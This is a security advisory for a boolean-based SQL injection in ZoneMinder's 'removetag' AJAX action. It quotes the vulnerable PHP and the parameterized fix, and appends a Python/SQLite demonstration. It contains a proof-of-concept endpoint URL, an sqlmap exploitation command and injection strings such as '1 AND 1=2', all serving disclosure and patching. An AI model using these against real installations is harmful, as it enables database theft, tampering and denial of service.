Boolean-based SQL Injection in ZoneMinder v1.37.\* <= 1.37.64
=============================================================
Critical
[connortechnology](https://github.com/connortechnology) published GHSA-qm8h-3xvf-m7j3 5 days ago
Package
-------
zoneminder (apt, ppa, aur)
Affected versions
-----------------
1.37.\* <= 1.37.64
Patched versions
----------------
1.37.65
Description
-----------
### Summary
ZoneMinder v1.37.\* <= 1.37.64 is vulnerable to boolean-based SQL Injection in the `removetag` action handler of **web/ajax/event.php**.
### Details
In **web/ajax/event.php**, I found the vulnerable code:
```php
case 'removetag' :
  $tagId = $_REQUEST['tid'];
  // Correctly parameterized: both values are bound with placeholders.
  dbQuery('DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?', array($tagId, $_REQUEST['id']));
  // Vulnerable: the user-controlled $tagId is interpolated into the query string.
  $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
  $rowCount = dbNumRows($sql);
  if ($rowCount < 1) {
    $sql = 'DELETE FROM Tags WHERE Id = ?';
    $values = array($_REQUEST['tid']);
    $response = dbNumRows($sql, $values);
    ajaxResponse(array('response'=>$response));
  }
```
Notice that **$tagId** is placed directly inside the **$sql** string, which is then executed without any parameter binding. This confirms that the query is vulnerable to SQL Injection.
### PoC
Although the script cannot be invoked directly by its file path, the documentation shows it is reachable through the following URL:

```
http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1
```

The `tid` parameter of this request is vulnerable to SQL Injection.
I used sqlmap to automate the exploitation process through this command:
```shell
sqlmap -u 'http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1'
```
Here is the PoC video:
[https://github.com/user-attachments/assets/3cc50e51-68cf-4540-8225-4288f73e0c08](https://github.com/user-attachments/assets/3cc50e51-68cf-4540-8225-4288f73e0c08)
### Impact
Full control of the SQL database: loss of data confidentiality and integrity, and denial of service via the SLEEP function.
### Mitigation
Here is the code modification that patches the vulnerability:

```php
$sql = "SELECT * FROM Events_Tags WHERE TagId = ?";
// dbNumRows() passes its second argument to PDOStatement::execute(), which
// expects an array of bound values (as the surrounding code already does).
$rowCount = dbNumRows($sql, array($tagId));
```

The fix binds the tag id as a query parameter instead of interpolating it into the SQL string, so the value can no longer alter the query's structure.
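As an added illustration (not part of the advisory or of ZoneMinder's code), the following Python/SQLite model reproduces the behavioural difference between the interpolated query and the parameterized fix. Table and column names follow the advisory; the sample rows are constructed, and the row count stands in for what `dbNumRows()` returns.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory copy of the Events_Tags table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Events_Tags (TagId INTEGER, EventId INTEGER)")
    conn.executemany(
        "INSERT INTO Events_Tags VALUES (?, ?)",
        [(1, 10), (1, 11), (2, 12)],  # tag 1 is used by two events, tag 2 by one
    )
    return conn


def num_rows_vulnerable(conn, tag_id):
    """Mirrors the original: $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId".

    Whatever the request supplies becomes part of the SQL text, so a value such as
    "1 AND 1=2" changes the WHERE clause itself instead of being compared to TagId.
    """
    sql = f"SELECT * FROM Events_Tags WHERE TagId = {tag_id}"
    return len(conn.execute(sql).fetchall())


def num_rows_fixed(conn, tag_id):
    """Mirrors the patch: the value is bound to a '?' placeholder.

    The driver sends the value separately from the statement, so it is only ever
    compared against TagId; in SQLite the non-numeric string matches no row.
    """
    sql = "SELECT * FROM Events_Tags WHERE TagId = ?"
    return len(conn.execute(sql, (tag_id,)).fetchall())


def tag_would_be_deleted(row_count):
    """The handler's follow-up decision: `if ($rowCount < 1)` remove the Tags row.

    With the interpolated query an attacker can steer this outcome true or false
    at will, which is the observable signal a boolean-based injection relies on.
    """
    return row_count < 1


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 AND 1=1", "1 AND 1=2", "0 OR 1=1"):
        print(f"{value!r:14} vulnerable={num_rows_vulnerable(db, value)} "
              f"fixed={num_rows_fixed(db, value)}")
```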